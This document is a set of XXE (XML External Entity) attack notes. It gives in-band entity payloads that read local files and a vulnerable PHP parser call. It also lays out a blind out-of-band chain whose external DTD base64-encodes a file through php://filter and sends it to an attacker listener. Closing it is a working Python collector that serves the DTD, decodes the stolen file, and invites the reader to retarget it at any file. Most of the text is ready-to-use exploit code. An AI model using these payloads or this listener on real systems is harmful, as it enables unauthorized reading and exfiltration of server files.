XXE payload

With echo (in-band): the parser substitutes the external entity and the application returns the element text, so the file content shows up directly in the response. The PUBLIC form below behaves like SYSTEM: the public identifier is only consulted if a catalog maps it, otherwise the system literal is what gets fetched.

<!DOCTYPE root [
  <!ENTITY c PUBLIC "bar" "C:/test.txt">
]>
<test>&c;</test>


<!DOCTYPE ANY [
  <!ENTITY f SYSTEM "C:/test.txt">
]>
<x>&f;</x>

PHP code example (the vulnerable parser call; LIBXML_NOENT is the flag that turns entity substitution on):

<?php
// Vulnerable call: LIBXML_NOENT tells libxml to substitute entities,
// external ones included, so the contents of C:/test.txt replace &f;.
// echo prints the SimpleXMLElement's text content, i.e. the file.
echo simplexml_load_string('<?xml version="1.0"?>
  <!DOCTYPE ANY [
    <!ENTITY f SYSTEM "C:/test.txt">
  ]>
<x>&f;</x>', "SimpleXMLElement", LIBXML_NOENT);


Without echo (out-of-band, blind): nothing from the parsed document comes back, so the file content is pushed to an attacker-controlled server through a chain of parameter entities loaded from an external DTD. The requests fire while the DTD is being processed, so a root element is only needed to keep the document well-formed:

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://127.0.0.1:9999/test.dtd">
%remote;%int;%send;
]>
<convert/>

Contents of http://127.0.0.1:9999/test.dtd (served by the attacker):

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1:9999/?p=%file;'>">

Two details matter here. `&#37;` is `%` written as a character reference: a literal `%` inside the value of `int` would be treated as a parameter-entity reference and expanded while `int` is declared, whereas the character reference survives until `%int;` is expanded in the victim's internal subset, where it declares the `send` entity that performs the callback. The php://filter base64 wrapper keeps newlines and characters such as `<` or `&` in the file from breaking the URL or the XML; the listener receives `GET /?p=<base64>` and decodes it.
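The attacker side of the blind chain, as an added example that is not part of the original notes: a small listener that serves test.dtd on the 127.0.0.1:9999 address used above and base64-decodes the `?p=` callback. The names `build_dtd`, `decode_callback` and `Collector` are this example's own, and the target path defaults to the page's `file:///D:/test.txt`.

```python
#!/usr/bin/env python3
"""Attacker-side listener for the blind XXE chain above.

Added example, not part of the original notes: it serves test.dtd on the
127.0.0.1:9999 address used on the page and decodes the ?p= callback.
The names build_dtd, decode_callback and Collector are this example's own.
"""
import base64
import binascii
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

LISTENER = "http://127.0.0.1:9999"
TARGET_FILE = "/D:/test.txt"  # becomes file:///D:/test.txt, as on the page


def build_dtd(target_file: str = TARGET_FILE, listener: str = LISTENER) -> str:
    """Generate the external DTD the victim's parser fetches.

    php://filter base64-encodes the file so newlines, '<' and '&' cannot
    break the URL or the XML. '&#37;' is '%' as a character reference: a
    literal '%' would be expanded while 'int' is declared, the character
    reference survives until %int; is expanded in the victim's internal
    subset, where it declares the 'send' entity that performs the callback.
    """
    resource = f"php://filter/read=convert.base64-encode/resource=file://{target_file}"
    return (
        f'<!ENTITY % file SYSTEM "{resource}">\n'
        f'<!ENTITY % int "<!ENTITY &#37; send SYSTEM \'{listener}/?p=%file;\'>">\n'
    )


def decode_callback(request_path: str):
    """Return the exfiltrated file bytes from a GET /?p=<base64> request.

    The query is split by hand instead of using parse_qs: base64 contains
    '+', which form decoding would turn into a space and corrupt the data.
    Returns None when the request carries no valid payload.
    """
    for part in urlparse(request_path).query.split("&"):
        key, sep, value = part.partition("=")
        if sep and key == "p":
            try:
                return base64.b64decode(unquote(value), validate=True)
            except (binascii.Error, ValueError):
                return None
    return None


class Collector(BaseHTTPRequestHandler):
    """Serves the DTD and logs decoded callbacks."""

    dtd = build_dtd().encode()

    def do_GET(self):
        if urlparse(self.path).path == "/test.dtd":
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(self.dtd)))
            self.end_headers()
            self.wfile.write(self.dtd)
            return
        data = decode_callback(self.path)
        if data is not None:
            sys.stdout.write(f"[+] {len(data)} bytes exfiltrated:\n")
            sys.stdout.write(data.decode("utf-8", errors="replace") + "\n")
        else:
            sys.stdout.write(f"[-] unexpected request: {self.path}\n")
        self.send_response(204)
        self.end_headers()


def main(port: int = 9999) -> None:
    """Listen on 127.0.0.1:9999 (the address the page's payload points at)."""
    HTTPServer(("127.0.0.1", port), Collector).serve_forever()


if __name__ == "__main__":
    main()
```

Run it, then submit the `<!DOCTYPE convert [...]>` document to the target: the victim parser fetches /test.dtd from this listener, reads the file through php://filter, and sends the base64 back as `?p=`, which the collector decodes and prints. Swap `TARGET_FILE` for the file you want on a given target.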